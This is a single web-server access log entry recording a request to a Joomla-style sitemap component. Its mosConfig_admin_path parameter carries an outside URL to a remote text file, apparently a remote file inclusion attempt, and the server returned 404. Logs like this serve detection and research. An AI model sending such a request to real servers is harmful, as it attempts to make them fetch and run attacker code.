89.218.85.18 - - [26/Oct/2008:10:18:11 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
